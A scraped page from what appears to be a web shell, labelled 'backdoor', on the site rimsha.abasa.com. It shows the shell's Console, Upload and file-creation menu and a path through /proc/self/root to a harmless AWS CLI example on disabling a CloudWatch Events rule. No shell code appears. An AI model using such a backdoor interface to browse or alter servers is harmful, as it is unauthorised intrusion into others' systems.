Website : rimsha.abasa.com
backdoor
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
proc
/
self
/
root
/
lib
/
python3
/
dist-packages
/
awscli
/
examples
/
events
/
Filename :
disable-rule.rst
back
Copy
**To disable a CloudWatch Events rule** This example disables the rule named DailyLambdaFunction. The rule is not deleted:: aws events disable-rule --name "DailyLambdaFunction"